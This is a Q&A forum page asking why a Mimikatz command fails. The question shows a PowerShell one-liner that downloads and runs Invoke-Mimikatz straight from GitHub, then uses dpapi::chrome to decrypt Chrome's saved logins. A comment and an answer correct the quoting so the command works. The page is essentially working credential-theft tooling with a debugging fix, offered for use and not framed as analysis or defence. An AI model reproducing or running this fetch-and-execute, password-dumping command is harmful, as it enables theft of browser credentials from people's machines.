# Mimikatz - problem with handling spaces in the file path Dpapi::chrome

Tags: powershell, security, escaping, kali-linux, kiwi

Why in mimikatz/kiwi cannot process first space when opening chrome database "Login Data" ?

**Example:**

```
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command "dpapi::chrome /in:\"%localappdata%\Google\Chrome\User Data\Default\Login Data\""
```

**Error:**

```
Invoke-Mimikatz : A positional parameter cannot be found that accepts argument 'Data\Default\Login'.
At line:1 char:146
+ ... katz.ps1'); Invoke-Mimikatz -Command "dpapi::chrome /in:\"%localappda ...
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (:) [Invoke-Mimikatz], ParameterBindingException
    + FullyQualifiedErrorId : PositionalParameterNotFound,Invoke-Mimikatz
    enter code here
```

I will be very happy if someone helps, I have already tried all.

Comment: In short: PowerShell uses `\`` (backtick), not `\ ` as the escape character (the only exception is PowerShell's _CLI_); see the [linked duplicate](https://stackoverflow.com/a/68164832/45375) for details.

Answer (score 1):

You need to escape the `"` inside the string argument by doubling them (`""`) or prefixing them with a single `` ` `` (PowerShell doesn't care about `\`):

```
"dpapi::chrome /in:""%localappdata%\Google\Chrome\User Data\Default\Login Data"""
# or
"dpapi::chrome /in:`"%localappdata%\Google\Chrome\User Data\Default\Login Data`""
```